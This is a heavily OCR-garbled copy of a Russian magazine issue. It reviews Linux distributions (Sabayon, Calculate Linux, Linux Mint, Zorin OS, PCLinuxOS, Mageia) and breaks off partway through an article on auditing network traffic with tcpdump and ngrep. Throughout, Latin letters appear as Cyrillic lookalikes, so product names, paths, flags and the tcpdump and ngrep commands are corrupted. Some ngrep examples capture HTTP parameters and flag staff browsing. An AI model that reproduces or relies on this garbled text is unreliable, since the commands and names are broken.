с помощью предоставляемых инструментов уже начала утомлять 
пользователей (тем более не все хотели разбираться в 115Е- 
флагах), то неудивительно, что появились желающие «допилить» 
дистрибутив. 

ЗаЬауоп 7 

Сайт проекта: заЬаѵоп.ога 
Лицензия: ЗРІ_ 

Аппаратные платформы: І686, х86_64 
Системные требования: Іпіеі Репііит II, 512 Мб РАМ, 6 Гб 
КегпеІ 3.0, ЗІіЬс 2.13, ІИеѵ 171, Х.огд 1.10.4, ЗІМОМЕ 3.2, КйЕ 4.7, 
иЬгеОІТісе.Огд 3.4.3 

ЗаЬауоп — самый известный форк Зепіоо, причем в рейтинге 
ОІБігоѵѵаісЬ.сот он давно обогнал своего родителя. Разработки 
ведет относительно небольшая группа под руководством итальян- 
ца РаЫо Егсиііапі. Цель проекта состоит в том, чтобы устранить все 
то, что мешает Зепіоо обрести большую популярность, а именно 
упростить установку, конфигурирование и сборку программ. 
Дистрибутив базируется на нестабильной ветке (поэтому в нем 
можно встретить все новинки) и полностью совместим с Зепіоо. 
Изначально он был ориентирован на десктопы, однако версия 5.4 
ЗегѵегВазе заточена уже под сервера. Со временем список сборок 
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В БаЬауоп для установки пакетов предлагается графический Епігору Біоге 

с различными рабочими столами расширился, и сегодня доступно 
несколько вариантов на основе образа ЗріпВазе: 

• основные релизы: КйЕ, СІМОМЕ; 

• экспериментальные: ХРсе, 1_Х0Е, ЕпІідЫептепІ и 5ріп Вазе/ 

0репѴ2 (оптимизированный для 0репѴ2). 

Кроме этого, предлагается релиз с минимальной средой 
СогеСйХ, который отличается от ЗріпВазе только наличием X 
(ЕІихЬох). В версии 4.1 появился инструмент для автоматической 
сборки образов Моіесиіе. Начиная с этой версии в подкаталоге 
ОДНУ сохраняется ежедневная сборка системы. Образы не ги- 
бридные, то есть напрямую не поддерживают установку на флеху 
(выручает команда ізоМуЬгісІ). 

Как и в Сепіоо, установка и обновление программ осуществля- 
ется при помощи системы Рогіаде, дистрибутив использует свой 
оверлей. Любопытно, что популярность ЗаЬауоп в основном обу- 
словлена собственной системой управления бинарными пакетами 
Епігору. Парадокс, конечно, особенно с учетом того, что фишка 
Сепіоо именно в автоматической сборке программ из сорцов, но 
так и есть. Для установки пакетов используется команда едію: 

• едио іпзііаіі тс 

Однако у едио задач на порядок больше, чем, например, у 
дебиановского арі-деі: здесь и управление репозиториями, и раз- 
маскировка, и обновление системы и конфигурационных файлов, и 
работа со зтагі-пакетами (несколько приложений в одном пакете), 
и многое другое. 

Доступен менеджер обновлений Мадпеіо и графический интер- 
фейс Зіоге для едио (запускается из Мадпеіо). В Зіоге приложения 
разбиты по группам (как в портежах) и распределены по рейтингу, 
реализован поиск. При установке пакета можно просмотреть его 
свойства (ІІЗЕ-флаги, маскировка, зависимости и т. п.) Главное, 
что пакетная база дистрибутива синхронизирована и полностью 
совместима с Рогіаде. Однако есть нюанс: етегде видит пакеты, 
установленные через едио (строка Раскаде ЗеШпд), а вот наоборот 
почему-то не всегда. Проблемы в этом нет, но нужно быть готовым 
к тому, что едио «затрет» пакетной версией собранное приложе- 
ние. Также в процессе работы могут возникнуть проблемы с совме- 
стимостью версий, так как в дереве пакетов, судя по всему, про- 
верка на совместимость не проводится. Поэтому в случае с ЗаЬауоп 
лучше всегда использовать один и тотже способ установки. 

В отличие от Саісиіаіе Ыпих (о нем ниже), в котором бинарники 



«привязаны» к версии, пакетный репозиторий в ЗаЬауоп общий, 
то есть пользователь может установить несколько сред и обнов- 
лять их любым удобным способом, без ограничений. Разработчики 
часто шаманят, раскладывая по разным пакетам локализацию и 
добавляя настройки. В версии 6 /еіс/таке.сопі стала более упоря- 
доченной. Ранее там были свалены в кучу все флаги, и создавалось 
впечатление, что разработчики не особо вникают, когда и какой 
включать. Однако из таке.сопі следовало бы как минимум убрать 
поддержку других языков. 

Загрузочный диск позволяет работать в Ыѵе-режиме или сразу 
начать установку. Также имеется режим медиастанции (на основе 
ХВМС). Для инсталляции используется редхатовская Апасопсіа, 
поэтому процесс развертывания нельзя назвать сложным даже 
для новичка. Правда, сюда перекочевали и классические ошибки 
Анаконды. Например, если указать русскую раскладку, то в про- 
цессе установки ее еще можно будет переключать, а вот первый 
раз войти в систему будет затруднительно. Проблем с локализа- 
цией нет, она проводится автоматически, при этом запрашивает- 
ся лишь загрузка дополнительных модулей (в основном русских 
тап). 

ЗаЬауоп имеет стандартный рабочий стол, все на месте, до- 
ступные по умолчанию приложения способны удовлетворить 
запросы рядового пользователя. Обои, оптимизированные для 
ѵѵібе-мониторов, в формат 4:3 конвертируются неудачно, причем 
с правами обычного пользователя изменить разрешение при по- 
мощи стандартных инструментов 6ІМ0МЕ мне не удалось, а под гооі 
нужное установилось автоматически. На рабочем столе размещен 
ряд дополнительных апплетов. Поскольку дистрибутив позициони- 
руется как мультимедийный, удивляет полное отсутствие каких- 
либо плагинов в браузере и дополнительных настроек. Зато кодеки 
и проприетарные драйвера (включая АТІ и N Ѵісііа) представлены 
в огромном количестве. Хотя разработчики и здесь отличились: 
в ядро вкомпилено практически все что можно, добавлена куча 
драйверов устройств и т. п. Все это ускоряет загрузку, хотя не- 
сколько утяжеляет систему. Файл .сопіід в ЗаЬауоп почти в два раза 
больше, чем в Саісиіаіе Ыпих (в Саісиіаіе содержится 1560 модулей, 
а в его ядре — 866, в ЗаЬауоп и его ядре — 2625 и 1250 соответ- 
ственно). 

Система поддерживает несколько системных профилей, кото- 
рые можно переключать. Профиль пользователя /еіс/зкеі содержит 
множество настроек (суммарный размер файлов около 14 Мб), 
большинство из которых обычно не требуется. 

Для проекта разработана англоязычная документация, ведется 
его поддержка на английском языке, ответы на многие вопросы 
также можно найти на форумах Сепіоо и СІ_. 



РЕЙТИНГ ПОПУЛЯРНОСТИ ДИСТРИБУ- 
ТИВОВ ПО ВЕРСИИ йІЗТРОѴѴАТСН.СОМ 
(ДАННЫЕ НА 06.11.2011) 



1. Міпі 


2155 


11. Мадеіа 


627 


2. ІІЬипІи 


2108 


12. І_иЬипІи 


612 


3. Еесіога 


1686 


13. Зсіепііііс 


575 


4. йеЫап 


1318 


14. 2огіп 


563 


5. орепЗІІЗЕ 


1290 


15. ЗІаскѵѵаге 


563 


6. АгсЬ 


1222 


16. СЬакга 


563 


7. РШпихОЗ 


1032 


17. ЗаЬауоп 


557 


8. СепЮЗ 


916 


18. ЕгееВЗй 


490 


9. Рирру 


866 


19. ВосІЫ 


478 


10. Мапбгіѵа 


708 


20. бепіоо 


453 
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Саісиіаіе І_іпих 11.9 

Сайт проекта: саісиіаіе-ііпих.ги 

Лицензия: ОРБ 

Аппаратные платформы: І686, х86_64 

Системныетребования: Іпіеі Репііит II, 128 (ХРсе) или 512 (КйЕ) Мб 
РАМ, 4-6 Гб 

КегпеІ 3.0.4, ОІіЬс 2.23.4, ІІбеѵ 164, Х.огд 1.10.4, 0ІЧОМЕ 2.32.1, ИЮЕ 
4.7.1, ЫЬгеО^ісе.Огд 3.3.4 

Набирающий популярность дистрибутив российских разработ- 
чиков, сообщество приверженцев которого постепенно растет. 
Изначально содержал две версии: сервер (С05 — йігесіогу 
Зегѵег) и КйЕ-десктоп (СЮ) — и создавался для внутрикорпора- 
тивных целей какудобный инструмент для развертывания сер- 
висов и рабочих мест, работающий «из коробки» (ЮАР, та і I, Ир, 

) а Ь Ь е г, прокси, переносимые профили и т. п.]. Собственно, это и 
есть фишка номер один. Затем, по мере привлечения внимания 
со стороны пользователей, начали появляться и другие вер- 
сии: СІМОМЕ (СЮ6), ХРсе (СЮХ), медиастанция СМС (Саісиіаіе 
Месііа Сепіег, с ХВМС), сборка для десктопа СІ_5 (Саісиіаіе Ыпих 
ЗсгаІсЬ) и для сервера С55 (Саісиіаіе ЗсгаІсЬ Зегѵег). Примеча- 
тельно, что рабочий стол в разных версиях выглядит одинаково, 
только тренированный глаз сможет определить версию на- 
вскидку. Был создан сайт с документацией, оверлей «признали» 
в Сепіоо, на официальном ІРС-канале стали появляться люди 
из Сепіоо Роипбаііоп. Один из них (АпіЬопу 0. Вазііе) уже взялся 
за разработку ЬагсІепесІ/зеІіпих-версии. Так как дистрибутив на 
100 % совместим с Сепіоо (отключи оверлей — и это уже Сепіоо) 
и предлагает удобные инструменты для быстрой установки и 
настройки, на СІ_ начали переходить и гентушники. 

Для управления многочисленными настройками предложен 
набор утилит Саісиіаіе 2 (ведется работа над третьим поколени- 
ем). Например, он включает программу для установки сі-іпзіаіі, 
которой, по сути, нужно указать лишь раздел харда или флешку, 
остальное она сделает сама. В последних релизах появилась и 
графическая надстройка, которая делает весь процесс еще более 
понятным и облегчает его контроль. Единственный недостаток 
состоит в том, что возможность автоматической разметки диска не 
предусмотрена, поэтому его придется подготавливать вручную при 
помощи Срагіесі или с/ісіізк. Но зато возможна установка на І_ѴМ и 
зоіі РАЮ без отдельного /Ьооі-раздела. На рабочий стол помещена 
ссылка на документацию и ІРС проекта, где можно получить по- 
мощь. Учитывая корни, проблем с локализацией изначально нет. 

Любая версия позволяет выгрузить систему в РАМ, чтобы осво- 
бодить привод, или запустить ее в режиме сборки. Интересно, что 
іпііга т^з в Кальке включает исіеѵ, поэтому он грузится быстро, без 
лишних модулей, которые подгружаются в БаЬауоп. 

В релизе 11.0 появились репозитории бинарных пакетов, но, 
в отличие от БаЬауоп, в этих репозиториях содержатся только те 
приложения, которые входят в базовый состав дистрибутивов, 
остальные приложения ставятся как обычно (из исходников). В СІ_ 
не предусмотрено специальных утилит вроде ецио, используется 
все тот же етегде, но сам процесс установки и обновления абсо- 
лютно прозрачен, и главное, нет коллизий «пакет ѵз сорец». Чтобы 
отказаться от бинарников, надо всего лишь переключить профиль 
(по умолчанию используется бинарный). 

# езеіесі: рг обіе І ізі: 

Выбираем нужный (текущий помечен символом «*») и активируем. 

# езеіесі: ргобіе зеі: 1 

Теперь все будет как в Сепіоо. Профили в СІ_ управляют мно- 
гими настройками - патчами, пакетами, ІІ5Е-флагами и масками. 
Создана система применения патчей без правки ебиіісі-файлов 



КЛОНЫ РЕОНАТ/РЕООКА И 5БАСКѴѴАРЕ 



Естественно, мир Ыпих не ограничен тремя указанными дистри- 
бутивами, есть еще РесІНаі/БесІога и ЗІаскѵѵаге, которые породили 
уйму клонов. Они тоже имеют право на существование, хотя по 
разным причинам и не смогли приобрести большую популярность. 

В качестве примера можно упомянуть СепЮЗ, который, по сути, не 
является форком, а представляет собой пересобранный РесІНаІ под 
другой лицензией и без некоторых специфических приложений. 

В оригинальной версии Еесіога отсутствуют кодеки и некоторые 
драйвера, и хотя их очень просто установить, некоторые хотят 
получать нужный функционал «из коробки». Соответствующий 
проект называется Еизіоп Ыпих ( Іизіопііпих.огд ). Название Еибипіи 
( Іисіипіи.огд і скрывает не очередной клон ІІЬипІи, а оптимизиро- 
ванный для нетбуков дистрибутив на базе Еесіога. Сторонников 
КйЕ может заинтересовать Хапде Ыпих ( орепхапде.сот ) — про- 
ект, ориентированный на новичка и под завязку забитый софтом. 
Однако самым известным клоном РесІНаІ (точнее, СепЮЗ) является 
ѴеІІоѵѵ йод Ыпих ( ѵеііоѵѵбоаііпих.сопп і. Он прочно занял свою нишу, 
предлагая сборки под РоѵѵегРС и Р53. 

Клонов Слаки не меньше. Среди них наиболее известны бы- 
стрый и дружелюбный канадский дистрибутив ѴесІогБіпих (ѵѵууѵу. 
ѵесіогііпих.сот ), имеющий свои инструменты и пакетную базу; 
мультимедийный 2еп\л/аІк ( гепѵѵаік.ога ), выпускаемый в несколь- 
ких редакциях и породивший несколько форков; а также лока- 
лизованные йеерЗіуІе ( сІеер5ІѵІе.ога.иа ) и Ад і I іа Ы п их (бывший 
МОРЗЫпих, ааіііаііпих.ги ). 



(/ѵаг/ІіЬ/Іаутап/саІсиІаІе/ргоІіІез/раІсЬез), которая, правда, пока 
не документирована. 

Есть еще одна фишка: новую версию дистра можно автомати- 
чески устанавливать в другой каталог на диске и после переза- 
грузки выбирать в Сгиб новую или старую версию. Весь процесс 
займет пять-семь минут, настройки при этом будут полностью 
перенесены. Для этого образ с новой системой следует поме- 
стить в каталог /ѵаг/саісиіаіе/ііпих и дать команду сі-іпзіаіі. В 
СЬготіит 05 такой метод, кстати, выбран в качестве основного. 



ммр** - Гг □ Ш I - ■ 
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Менеджер программ из І_іпих Міпі 



ПОСЛЕДОВАТЕЛИ ЦВІІМШ 



Казалось бы, ІІЬипІи, прочно занявший первое место по популяр- 
ности, уже нет смысла улучшать. Ан нет, клонов этот дистрибутив 
породил несметное количество. 

І_іпих Міпі: 11 "Каіуа" 

Сайт проекта: Ііпихтіпі.сот 

Лицензия: 6РІ_ 

Аппаратные платформы: І386, х86_64 
Системные требования: Іпіеі Репііит II, 512 Мб РАМ, 4 Гб 
КегпеІ 2.6.38-8, ЗІіЬс 2.13, ІИеѵ 167, Х.огд 1.10.1, СЫОМЕ 2.32.1, 
ЫЬгеСЖісе.Огд 3.3.2 

Самый известный и популярный форк ІІЬипІи, да и вообще, навер- 
ное, дистрибутив І_іпих. На момент написания этих строк (начало 
октября) практически догнал родителя в рейтинге ОізІгоѵѵаІсЬ.сот, 
обосновавшись на втором месте. Разработкой занимается много- 
численное комьюнити под руководством ирландца СІетепІ І_е{еЬѵге. 
Цель проекта — дать пользователю более понятную в работе среду, 
которую без проблем сможет использовать новичок. В системе 
по умолчанию имеются кодеки и драйвера (проприетарных нет). 
Полностью переработанный интерфейс выполнен в ѴѴіпсІоѵѵз-стиле. 

За исключением специфических пакетов, все остальное ставится 
из репозитория ІІЬипІи, с которым дистрибутив совместим на 100 %. 
Обычно релизы выходят через месяц после анонса родительского 
дистрибутива, поэтому шероховатостей, на которые богат каждый 
новый ІІЬипІи, здесь уже нет. В наименование релиза входит целое 
число и женское имя. Предложено несколько приложений соб- 
ственной разработки, упрощающих настройку. Это, прежде всего, 
меню тіпіМепи, менеджер приложений тіпііпзіаіі и менеджер 
обновлений тіпШрсЫе. Установка при помощи тіпііпзіаіі проста 
и понятна: выбираем программу и нажимаем «Установить». До- 
ступно описание, имеется рейтинг, реализован поиск, приложения 
разбиты на группы. В ІІЬипІи недавно появился ЗоЙѵѵаге Сепіег, 
но пока он не слишком удобен, а его функциональность слабовата. 
Кроме этого, приложения можно устанавливать через веб-сайт 
комьюнити ( соттипііу.ІіпихтіпЕсот/зоКѵѵаг ). В тіпШрсІаІе все 
обновления разбиты на группы: от безопасных, протестированных 
сообществом, до «рискованных». Как и в ІІЬипІи, есть І_Т5-версии и 
версии с поддержкой в течение короткого периода. Относительно 
недавно появился вариант І_МОЕ, который построен на йеЫап 
с рабочим столом Споте или ХРсе и представляет собой РоІІіпд 
геіеазе. В название І_МОЕ входят год и месяц выхода (201109). Во 
всех версиях присутствует основная редакция 01М0МЕ (поданным 



проекта, 50 % линуксоидов используют именно ее). Пока разработ- 
чики не гонятся за новизной и предлагают старый проверенный 
2.32. Кроме того, в разных версиях доступны неофициальные сбор- 
ки с КйЕ, ХРсе, РІихЬох и другими рабочими столами. Для скачи- 
вания предлагаются разные варианты: в виде ОѴО-образа (самый 
полный, с кодеками), ОЕМ-образа и Сй-образа (без кодеков). 
Установщик из ѴѴіпсІоѵѵз имеется только в последнем. 

На сайте проекта можно найти документацию (есть и на рус- 
ском), а также весьма подробный список совместимого железа. 

2огіп 05 5.1 

Сайт проекта: гогіп-оз.сот 
Лицензия: 6РІ_ 

Аппаратные платформы: І386, х86_64 
Системные требования: Іпіеі Репііит II, 512 Мб РАМ, 6 Гб 
КегпеІ 2.6.38, 6ІіЬс 2.13, ІИеѵ 167, Х.огд 1.10.1, 6ІМ0МЕ 2.32.2, 
ЫЬгеСЖісе.Огд 3.3. 3.1 

Дистрибутив болгарского программиста Артема Зорина, основан- 
ный на пакетной базе ІІЬипІи и ориентированный на начинающего 
пользователя, привыкшего к ѴѴіпсІоѵѵз. Внешний вид рабочего 
стола (меню на базе бпоМепи, панель задач, тема оформления, 
значки) практически полностью копирует десктоп ѴѴіп7. Соот- 
ветствующим образом подобраны программы, кодеки и драйвера. 
Файловым менеджером служит ІМаііІіІиз-ЕІетепІагу с расширением 
ЗІооЬиз Ргеѵіеѵѵ, которое функционально сходно с Арріе Оиіскіоок. 
По умолчанию дистрибутив включает все популярные сторонние 
репозитории, ЗоЙѵѵаге Сепіег показывает рейтинг приложений. 

В состав дистрибутива входит менеджер 2огіп 05 І_оок СЬапдег 
собственной разработки, позволяющий одним кликом изменять 
внешний вид, выбирая его в стиле ѴѴіп7, ѴѴіпХР или ІІЬипІи. Еще 
один инструмент — Іпіегпеі Вгоѵѵзег Мападег — предназначен для 
быстрой установки и выбора веб-браузера (по умолчанию СЬготе). 

Дополнительной фишкой 205 является предустановленный ѴѴіпе с 
РІауОпЫпих и ѴѴіпеІгіскз, который упрощает использование ѴѴіпсІоѵѵз- 
программ. В остальном дистрибутив очень напоминает ІІЬипІи. На вы- 
бор имеется несколько версий, три из них — Соге (содержит базовый 
набор приложений), 1_іІе (облегченная версия на І_ХОЕ) и Ебисаііопаі 
— доступны бесплатно. «Заряженные» версии (ІЖітаІе, Визіпезз, 
МиШтесІіа, Оатіпд) предлагаются за символическую сумму. Также 
как и в ІІЬипІи, имеется І_Т5-версия дистрибутива (3.1). 




Интерфейс 2огіп 05 выполнен в стиле ѴѴіп7 
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Для локализации РСЫпихОБ необходимо вызвать асісііосаіе 



ПОСЛЕДОВАТЕЛИ МАЫРРІѴА 



Благодаря поддержке большого количества языков и дружелюб- 
ности к рядовому юзеру, дистрибутив Мапсігіѵа всегда пользовался 
большой популярностью. 

РСЫпихОБ КОЕ 2011 йезкЮр 

Сайт проекта: рсііпихоз.сот 

Лицензия: СРІ_ 

Аппаратные платформы: І586 

Системныетребования: Іпіеі Репііит II, 512 Мб РАМ, 3 Гб 
КегпеІ 2.6.38.8, 6МЬс 2.11.2, Ысіеѵ 168, Х.огд 1.10.4, 6Ы0МЕ 2.32.1, 
КБЕ 4.6.4 

Разработка началась в 2003 году на основе дополнений к Мапсігаке 
(сейчас Мапсігіѵа). Слоган РасІісаІІу Бітріе полностью отражает идею. 

На момент появления дистрибутив был не только забит кодеками под 
завязку, но и предлагал работу в Ыѵе-режиме. В то время похвастаться 
этим могли лишь единицы. С 2007 года РСЫпихОБ использует собствен- 
ную кодовую базу и не зависит от Мапсігіѵа. Официально выпускается 
только КОЕ-версия, остальные (ХРсе, ОШЕ, ОрепВох и 6ІМ0МЕ) раз- 
рабатывает комьюнити. Оно же выпускает РиІІ Мопіу йезкіор йѴй — 
сборку, до отказа набитую софтом. Дистрибутив реализован как РоІІіпд 
геіеазе, что нетипично для систем РРМ-ЬазесІ. Еще одной особенностью 
РСІ.05 является то, что в нем отсутствует сборка под 64-битный СРСІ. Так 
как дистрибутив выходит только в виде Сй-образа, то места для всех 
драйверов не хватает и доступ к ним упрощен. Нет в базовой версии 
и офисного пакета, но ЫЬгеОІТісе легко можно установить по ссылке в 
меню. Так как ІІРРМ на момент релиза РСЫпихОБ только появился и был 
еще не обкатан, в качестве программы для установки приложений был 
выбран АРТ с Бупарбс. Установка при помощи мастера, построенного 
на йгакХ, выполняется очень просто: по сути, нужно лишь указать диск. 
Дистрибутив поддерживает большое количество языков, для подклю- 



ДОПОЛНИТЕЛЬНОЙ 
ФИШКОЙ 205 ЯВЛЯЕТСЯ 
ПРЕДУСТАНОВЛЕННЫЙ ЖШЕ С 
РЬАУОЫиГШХ И ѴШЕТШСК5 



чения которых используется Ыэсаіігабоп Мападег (асЫІосаІе): просто 
запускаем его, выбираем нужный язык и ждем, когда скачаются файлы. 

В меню есть пункт, позволяющий пересобрать свою версию дистрибути- 
ва. Помимо всего прочего, проект выпускает собственный ежемесячный 
электронный журнал РСЫпихОБ Мадагіпе, а на его основе разработано 
несколько дистрибутивов (КагозЫ, САЕІіпих, ТіпуМе и 2ЕІМ-тіпі). 

Мадеіа 1 

Сайт проекта: тааеіа.ога/ги/ 

Лицензия: 0Р1_ 

Аппаратные платформы: І586, х86_64 
Системныетребования: Іпіеі Репііит II, 512 Мб РАМ, 6 Гб 
КегпеІ 3.0.4, ОІіЬс 2.12.1, ІИеѵ 173, Х.огд 1.10.4, 0ІМОМЕ 2.32.1, КйЕ 
4.7.4, ЫЬгеСЖісе.Огд 3.4.3 

Самый молодой проект, о котором мы упомянем в нашем обзо- 
ре, стартовал в сентябре 2010. Он нацелен на разработку форка 
Мапсігіѵа, который переживает не лучшие времена. Группа энту- 
зиастов, в которую входят в том числе и уволенные сотрудники 
Мапсігіѵа, решила выпустить версию системы, особенности которой 
не будут определяться экономической ситуацией и настроениями 
руководства. Первый релиз вышел через девять месяцев после 
анонса. Этот некоммерческий проект практически мгновенно 
обзавелся сообществом. Сегодня в разработке участвуют более ста 
человек, появились спонсоры, поддерживающие дистрибутив фи- 
нансово, и люди, занимающиеся сборкой пакетов. Как и родитель, 
Мадеіа не имеет проблем с локализацией: в дистрибутив заложена 
поддержка 161 языка, сайт проекта переведен на 20 языков. 

Для загрузки доступно несколько образов. Во-первых, 32-бит- 
ный Сй с рабочим столом КйЕ или СІМОМЕ. При загрузке необхо- 
димо выбрать вариант с нужным языком (Еигора 2). йѴО-образ 
150, содержащий все пакеты, предлагается как для 32-, так и для 
64-битных систем. Есть версия для сетевой установки. Работа в 
Мадеіа во всем напоминает работу в Мапсігіѵа. Установка при по- 
мощи Мадеіа І_іѵе также не представляет сложности, в процессе 
можно удалять неиспользуемые локали и драйвера. К слову, в 
дистрибутив перекочевал и старый недостаток: отсутствие на важ- 
ных этапах кнопки «Назад». В дистрибутив входят все основные 
кодеки, драйвера и набор приложений, которых вполне хватает на 
первое время. Система настраивается при помощи Мадеіа Сопігоі 
Сепіег, который создан на основе Мапсігіѵа СС. Установкой про- 
грамм заведует немного видоизмененный Рртбгаке. Некоторые 
версии Мапсігіѵа возможно обновить до Мадеіа 1. О том, как это 
сделать, можно узнать в руководстве тааеіа.огд/еп/1/тідгаіе . □С 
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Мадеіа представляет собой неофициальную версию Мапсігіѵа, созданную сообществом 
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Евгений Зобнин (ехесЬіІ.ги) 



Фильтруй эфир! 




ФИЛ ЫРУИ 
ЭФИР! 
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АУДИТ 
СЕТЕВОГО 
ТРАФИКА 
С ПОМОЩЬЮ 
ТСРОІЖР 




Для ШМІХ-систем разработано множество 
самых разнообразных сниферов и анализаторов 
трафика с удобным графическим интерфейсом 
и большим количеством функций. Но ни 
один из них не может сравниться в гибкости, 
универсальности и распространенности со 
старым как мир Ісрбитр. Это утилита, входящая 
в состав многих дистрибутивов І_іпих и всех 
ВБО-систем «из коробки», сможет выручить тебя, 
когда другие средства будут недоступны. 




ВВЕДЕНИЕ 



Утилита Ісрбшпр — это снифер сетевых пакетов с интерфейсом ко- 
мандой строки, не имеющий ни графического, ни псевдографического 
интерфейса. Новичкам он может показаться неуклюжим и слишком 
старомодным, однако в опытных руках превращается в настоящий 
швейцарский нож для вскрытия любых сетевых пакетов и протоколов. 
Опытные сисадмины всегда рекомендуют новичкам использовать 
Ісрбитр вместо любых других утилит, так как его отчеты очень нагляд- 
ны и прозрачны. 

Утилита появилась на свет почти 25 лет назад в университете Берк- 
ли и до сих пор продолжает активно развиваться, оставаясь эталоном 
подобных инструментов для операционной системы ІЭ N IX. Сегодня 
почти все сниферы для ІЛМІХ-систем и многие аналогичные программы 
для ѴѴіпсіоѵѵб используют библиотеку захвата пакетов ІіЬрсар, разрабо- 
танную специально для утилиты Арбитр. 

В этой статье мы рассмотрим все аспекты, касающиеся Ісрбштір, от 
основ работы с ней до способов выявления сетевых атак, аномалий и 
различных сбоев с ее помощью. 
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РЫЗ-запрос в логах Ісрсіитр 
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0Ы5-запрос с выводом дополнительной информации 



Снифер Ісрсіитр поддерживает множество протоколов, благо- 
даря чему может преобразовывать в читаемый вид информацию о 
ТСР, ІЮР, ІСМР, 5МВ/СІР5, І\ІР5, АР5, АррІеТаІк. Но что если Ісрсіитр 
ничего не знает об используемом протоколе прикладного уровня 
или не может определить его? В таких случаях он просто выводит 
информацию о пакете. Она может выглядеть примерно так: 

Р1а^5 [.], зед 3666073194:3666074622, аск 3281095139, 
іл/іп 2000 . орІііопБ [пор, пор, Т5 ѵаі 70228462 есг 1681724]. 
1еп§1=Іі 1428 

Это ТСР-пакет, информацию о котором Ісрсіитр представляет в 
следующем формате (поля разделяются запятыми): 

Яа%5 - установленные флаги. Обозначаются символами 
$ (5УІ\П. Р (РШ. Р (РЦ5Ю и К (К5~П. точка означает 
отсутствие установленных флагов. 

сІаІа-Беяпо - описывает данные, содержащиеся в пакете в 
формате Ягбі: : Іазі:, где бпзі; и ІаБІ: - номер 
последовательности первого и последнего байта 
передаваемых данных пЬуЕеБ. 

ас к - след у ющ и й ном е р пос ле до в ательности ( І5 ІМ + 1 ). 
міпсіом — размер окна. 

орІіопБ - здесь могут указываться дополнительные сведения, 
например <Ш55 1024> (максимальный размер сегмента). 

Іеп^Іті: - длина пакета. 



НАЕДИНЕ С КОНСОЛЬЮ 



Попробуем разобраться в том, как работает Ісрсіитр и с какой 
стороны следует к нему подходить. Открой терминал и запусти про- 
грамму с правами пользователя гооі (как и любой снифер, Ісрсіитр 
должен иметь полный доступ к сетевым интерфейсам), указав имя 
интерфейса и ограничив количество выводимых пакетов десятью: 

# Іісрсіитр -і іл/ІапѲ -с 10 -п 

Ключ ’-п' отключает преобразование ІР-адресов в 0ІМ5-имена. 
Теперь попробуем отследить обмен только с конкретным хостом, на- 
пример с домашним роутером: 

# Іісрсіитр -і іл/ІапѲ -с 10 -п ііобі: 192.168.0.1 \ 

апсі рогі: 53 

Разберемся, что же нам вывел Ісрсіитр, на примере двух строк, 
представленных на скриншоте «0І\І5-запрос глазами Ісрсіитр». 
Сразу видно, что это 0І\І5-запрос (порт 53) с хоста 192.168.0.101 хосту 
192.168.0.1 и ответ на него. Но что значат все остальные символы? 

Цифры 16:22:41.340105 — это время отправки пакета сточно- 
стью до миллионной доли секунды (так называемый ітас). Две 
буквы ІР, как нетрудно догадаться, идентифицируют используе- 
мый протокол сетевого уровня, далее идут адрес:порт отправки 
и адрес:порт назначения пакета. Все, что идет после двоеточия, 
напрямую зависит от используемого протокола транспортного 
или прикладного уровня. Снифер Ісрсіитр преобразует знакомые 
ему протоколы в понятный для пользователя вид, а незнакомые 
оставляет как есть и просто приводит содержимое пакета. В 
данном случае Ісрсіитр расшифровал 0ІМ5-сообщения и вер- 
нул строку «49244+ А? уа.пи. (23)», которая означает, что был 
послан запрос адреса «А?», ассоциированного с именем уа.ги, а 
общая длина пакета за вычетом ТСР/ІР-заголовков составила 23 
байта. Первая цифра — это идентификатор запроса. 

В следующей строке мы видим ответ, формат представления 
которого практически аналогичен формату запроса с той лишь раз- 
ницей, что здесь после идентификатора запроса следует инфор- 
мация о количестве найденных записей (8/2/3) и сами записи (А 
213.180. 204.3, А 77.88.21.3, А 87.250. 250.3...). 



Все эти данные могут быть очень полезны при изучении или 
отладке протоколов и сетевых приложений, однако они ничего не 
говорят нам о содержимом пакета. Чтобы увидеть его содержимое в 
шестнадцатеричном формате, следует применить флаг '-Х': 

# Іісрсіитр -і^ыІапѲ -с 10 -п -X \ 
ііобі: 192.168.0.1 апсі рогі: 80 

Эту функцию очень удобно использовать для анализа таких 
протоколов, как НТТР, где передача данных идет открытым текстом. 
Для бинарных протоколов и протоколов с шифрованием она, конеч- 
но же, бесполезна. 

Кроме того, для получения дополнительных сведений о пакете 
можно использовать флаг ’-ѵ’. Тогда после метки ІР в скобках 
появится подробная информация об ІР-пакете: 

(1:05 0x0., 1:1:1 64, ісі 8339., оТТзеІ: 0., Па§5 [ОР]„ 
ргоіо ШР (17Ь_1еп§*11 51) 

В общем-то, здесь все довольно прозаично. Сначала идеттип 
обслуживания (Т05), далее следуют время жизни пакета (ТТІ_), 
идентификатор пакета, смещение от начала первого пакета в 
цепочке, флаги, используемый прокол транспортного уровня (ТСР, 
ІЮР, ІСМР) и длина. 



ПРОДВИНУТЫЕ возможности 



Мы уже рассмотрели большинство самых важных полезных воз- 
можностей Ісрсіитр, но его функциональность намного шире. 
Например, мы использовали операторы Ьобі и рогі, чтобы указать 
адрес и порт, необходимые для фильтрации вывода, но что если нам 
надо увидеть только те пакеты, которые идут на указанный адрес? 
Для этого можно использовать оператор зге: 

# ісрсіитр -і іл/ІапѲ -с 10 -п бгс 192.168.0.1 

Существует и его обратный вариант сізі, указывающий адрес 
назначения. Как было показано выше, все операторы можно комби- 
нировать с помощью оператора апсі: 

# Іісрсіитр -і іл/ІапѲ рогі: по - ! 22 апсі рогі: поі: 53 
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Фильтруй эфир! 



СЕТЕВОЙ 6РЕР 



Снифер {срсіиітір отличается универсальностью и широким 
функционалом, однако он не очень удобен для поиска определенных 
данных в передаваемых пакетах. С этой задачей гораздо лучше 
справляется пдгер, предназначенный для отображения проходящих 
сетевых пакетов, которые удовлетворяют заданной маске. 

Например, чтобы найти параметры, передаваемые методами 6ЕТ 
и Р05Т в рамках НТТР-сессии, можно использовать следующую 
команду: 

# п§гер -1 -я -сі е-ЫіѲ " Л 6ЕТ | Л Р05Т " \ 

ѣср апсі рогѣ 80 

Выявляем бездельников: 

# п§гер -і ’§ате* |р0гп Іасіиіѣ ' -ІдІ Ьуііпе \ 

-сі еІіМѲ > зіаскегв .ііхіі 



Анализируем ЗМТР-трафик на всех сетевых интерфейсах: 
# п^гер -і ' гсріі 1іо|таі1 -Рпот' Ііср рогіі зтіір 



Таким способом мы мониторим сетевой трафик, исключая 55Н- 
сессии и 0І\І5-запросы. Можно использовать ог (или) и ехсерЕ (не). 
Кроме того, Есрбитр понимает диапазоны портов: 

# Ііср сіитр -і ыІапѲ -с 10 -п рог1ігап§е 21-23 

Снифер умеет отфильтровывать пакеты по размеру: 

